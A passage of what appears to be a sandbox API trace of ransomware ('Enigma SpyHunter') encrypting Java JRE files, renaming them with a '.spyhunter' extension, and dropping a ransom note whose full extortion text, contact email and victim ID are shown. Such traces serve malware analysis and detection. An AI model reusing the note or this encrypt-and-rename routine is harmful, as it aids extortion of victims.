(lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0171.992] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e5fc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e5fc*=0x2ac, lpOverlapped=0x0) returned 1 [0171.992] CloseHandle (hObject=0x178) returned 1 [0171.992] GetProcessHeap () returned 0x2c0000 [0171.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03cf8 | out: hHeap=0x2c0000) returned 1 [0171.992] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e598 | out: pbBuffer=0x57e598) returned 1 [0171.992] GetProcessHeap () returned 0x2c0000 [0171.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0171.993] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e590*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e590*=0x30) returned 1 [0171.993] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\splash.gif" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\splash.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0171.994] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\splash.gif") returned 58 [0171.994] StrStrW (lpFirst="splash.gif", lpSrch=".txt") returned 0x0 [0171.994] GetProcessHeap () returned 0x2c0000 [0171.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0171.994] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e554, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e554*=0x2800, lpOverlapped=0x0) returned 1 [0172.059] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0172.059] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e554, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e554*=0x2800, lpOverlapped=0x0) returned 1 [0172.059] GetProcessHeap () returned 0x2c0000 [0172.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0172.059] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.059] WriteFile (in: hFile=0x178, lpBuffer=0x57e594*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e554, lpOverlapped=0x0 | out: lpBuffer=0x57e594*, lpNumberOfBytesWritten=0x57e554*=0x4, lpOverlapped=0x0) returned 1 [0172.116] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e554, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e554*=0x30, lpOverlapped=0x0) returned 1 [0172.116] CloseHandle (hObject=0x178) returned 1 [0172.116] GetProcessHeap () returned 0x2c0000 [0172.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0172.117] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\splash.gif.spyhunter") returned 68 [0172.117] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\splash.gif" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\splash.gif"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\splash.gif.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\splash.gif.spyhunter")) returned 1 [0172.118] GetProcessHeap () returned 0x2c0000 [0172.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0172.118] GetProcessHeap () returned 0x2c0000 [0172.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0172.118] GetProcessHeap () returned 0x2c0000 [0172.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5fd00 | out: hHeap=0x2c0000) returned 1 [0172.118] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e598 | out: pbBuffer=0x57e598) returned 1 [0172.118] GetProcessHeap () returned 0x2c0000 [0172.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0172.118] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e590*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e590*=0x30) returned 1 [0172.118] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_CN.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_zh_cn.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0172.119] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_CN.properties") returned 73 [0172.119] StrStrW (lpFirst="messages_zh_CN.properties", lpSrch=".txt") returned 0x0 [0172.119] GetProcessHeap () returned 0x2c0000 [0172.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0172.119] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e554, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e554*=0xfe8, lpOverlapped=0x0) returned 1 [0172.206] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff018, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0172.206] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xfe8, lpNumberOfBytesWritten=0x57e554, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e554*=0xfe8, lpOverlapped=0x0) returned 1 [0172.206] GetProcessHeap () returned 0x2c0000 [0172.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0172.206] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.208] WriteFile (in: hFile=0x178, lpBuffer=0x57e594*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e554, lpOverlapped=0x0 | out: lpBuffer=0x57e594*, lpNumberOfBytesWritten=0x57e554*=0x4, lpOverlapped=0x0) returned 1 [0172.209] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e554, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e554*=0x30, lpOverlapped=0x0) returned 1 [0172.209] CloseHandle (hObject=0x178) returned 1 [0172.209] GetProcessHeap () returned 0x2c0000 [0172.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0172.209] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_CN.properties.spyhunter") returned 83 [0172.209] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_CN.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_zh_cn.properties"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_CN.properties.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_zh_cn.properties.spyhunter")) returned 1 [0172.210] GetProcessHeap () returned 0x2c0000 [0172.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0172.210] GetProcessHeap () returned 0x2c0000 [0172.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0172.210] GetProcessHeap () returned 0x2c0000 [0172.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee4c50 | out: hHeap=0x2c0000) returned 1 [0172.211] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e590 | out: pbBuffer=0x57e590) returned 1 [0172.211] GetProcessHeap () returned 0x2c0000 [0172.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0172.211] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e588*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e588*=0x30) returned 1 [0172.212] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_es.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_es.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0172.212] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_es.properties") returned 70 [0172.212] StrStrW (lpFirst="messages_es.properties", lpSrch=".txt") returned 0x0 [0172.212] GetProcessHeap () returned 0x2c0000 [0172.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0172.212] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e54c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e54c*=0xe10, lpOverlapped=0x0) returned 1 [0172.305] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff1f0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0172.305] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x57e54c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e54c*=0xe10, lpOverlapped=0x0) returned 1 [0172.305] GetProcessHeap () returned 0x2c0000 [0172.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0172.305] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.305] WriteFile (in: hFile=0x178, lpBuffer=0x57e58c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e54c, lpOverlapped=0x0 | out: lpBuffer=0x57e58c*, lpNumberOfBytesWritten=0x57e54c*=0x4, lpOverlapped=0x0) returned 1 [0172.305] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e54c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e54c*=0x30, lpOverlapped=0x0) returned 1 [0172.305] CloseHandle (hObject=0x178) returned 1 [0172.306] GetProcessHeap () returned 0x2c0000 [0172.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0172.306] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_es.properties.spyhunter") returned 80 [0172.306] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_es.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_es.properties"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_es.properties.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_es.properties.spyhunter")) returned 1 [0172.307] GetProcessHeap () returned 0x2c0000 [0172.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0172.307] GetProcessHeap () returned 0x2c0000 [0172.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0172.307] GetProcessHeap () returned 0x2c0000 [0172.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7c6f0 | out: hHeap=0x2c0000) returned 1 [0172.307] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e590 | out: pbBuffer=0x57e590) returned 1 [0172.308] GetProcessHeap () returned 0x2c0000 [0172.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0172.308] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e588*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e588*=0x30) returned 1 [0172.308] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0172.309] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages.properties") returned 67 [0172.309] StrStrW (lpFirst="messages.properties", lpSrch=".txt") returned 0x0 [0172.309] GetProcessHeap () returned 0x2c0000 [0172.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0172.309] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e54c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e54c*=0xb2c, lpOverlapped=0x0) returned 1 [0172.358] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff4d4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0172.358] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xb2c, lpNumberOfBytesWritten=0x57e54c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e54c*=0xb2c, lpOverlapped=0x0) returned 1 [0172.358] GetProcessHeap () returned 0x2c0000 [0172.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0172.358] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.358] WriteFile (in: hFile=0x178, lpBuffer=0x57e58c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e54c, lpOverlapped=0x0 | out: lpBuffer=0x57e58c*, lpNumberOfBytesWritten=0x57e54c*=0x4, lpOverlapped=0x0) returned 1 [0172.358] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e54c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e54c*=0x30, lpOverlapped=0x0) returned 1 [0172.358] CloseHandle (hObject=0x178) returned 1 [0172.358] GetProcessHeap () returned 0x2c0000 [0172.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0172.359] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages.properties.spyhunter") returned 77 [0172.359] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages.properties"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages.properties.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages.properties.spyhunter")) returned 1 [0172.360] GetProcessHeap () returned 0x2c0000 [0172.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0172.360] GetProcessHeap () returned 0x2c0000 [0172.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0172.360] GetProcessHeap () returned 0x2c0000 [0172.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03b58 | out: hHeap=0x2c0000) returned 1 [0172.360] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\jqs\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0172.361] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0172.361] WriteFile (in: hFile=0x178, lpBuffer=0x57e4bf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e5e8, lpOverlapped=0x0 | out: lpBuffer=0x57e4bf*, lpNumberOfBytesWritten=0x57e5e8*=0x127, lpOverlapped=0x0) returned 1 [0172.362] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0172.362] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e5e8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e5e8*=0x2ac, lpOverlapped=0x0) returned 1 [0172.362] CloseHandle (hObject=0x178) returned 1 [0172.362] GetProcessHeap () returned 0x2c0000 [0172.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7b100 | out: hHeap=0x2c0000) returned 1 [0172.362] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e588 | out: pbBuffer=0x57e588) returned 1 [0172.362] GetProcessHeap () returned 0x2c0000 [0172.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0172.363] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e580*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e580*=0x30) returned 1 [0172.363] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs\\jqsmessages.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\jqs\\jqsmessages.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0172.363] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs\\jqsmessages.properties") returned 74 [0172.363] StrStrW (lpFirst="jqsmessages.properties", lpSrch=".txt") returned 0x0 [0172.363] GetProcessHeap () returned 0x2c0000 [0172.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0172.364] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e544, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e544*=0x6b8, lpOverlapped=0x0) returned 1 [0172.479] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff948, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0172.479] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x6b8, lpNumberOfBytesWritten=0x57e544, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e544*=0x6b8, lpOverlapped=0x0) returned 1 [0172.479] GetProcessHeap () returned 0x2c0000 [0172.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0172.479] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.480] WriteFile (in: hFile=0x178, lpBuffer=0x57e584*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e544, lpOverlapped=0x0 | out: lpBuffer=0x57e584*, lpNumberOfBytesWritten=0x57e544*=0x4, lpOverlapped=0x0) returned 1 [0172.480] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e544, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e544*=0x30, lpOverlapped=0x0) returned 1 [0172.480] CloseHandle (hObject=0x178) returned 1 [0172.480] GetProcessHeap () returned 0x2c0000 [0172.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0172.480] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs\\jqsmessages.properties.spyhunter") returned 84 [0172.480] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs\\jqsmessages.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\jqs\\jqsmessages.properties"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs\\jqsmessages.properties.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\jqs\\jqsmessages.properties.spyhunter")) returned 1 [0172.482] GetProcessHeap () returned 0x2c0000 [0172.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0172.482] GetProcessHeap () returned 0x2c0000 [0172.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0172.482] GetProcessHeap () returned 0x2c0000 [0172.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee47f0 | out: hHeap=0x2c0000) returned 1 [0172.483] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e580 | out: pbBuffer=0x57e580) returned 1 [0172.483] GetProcessHeap () returned 0x2c0000 [0172.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0172.483] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e578*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e578*=0x30) returned 1 [0172.483] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\ffjcext.zip" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\ffjcext.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0172.484] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\ffjcext.zip") returned 59 [0172.484] StrStrW (lpFirst="ffjcext.zip", lpSrch=".txt") returned 0x0 [0172.484] GetProcessHeap () returned 0x2c0000 [0172.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0172.484] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e53c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e53c*=0x2800, lpOverlapped=0x0) returned 1 [0172.533] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0172.533] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e53c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, 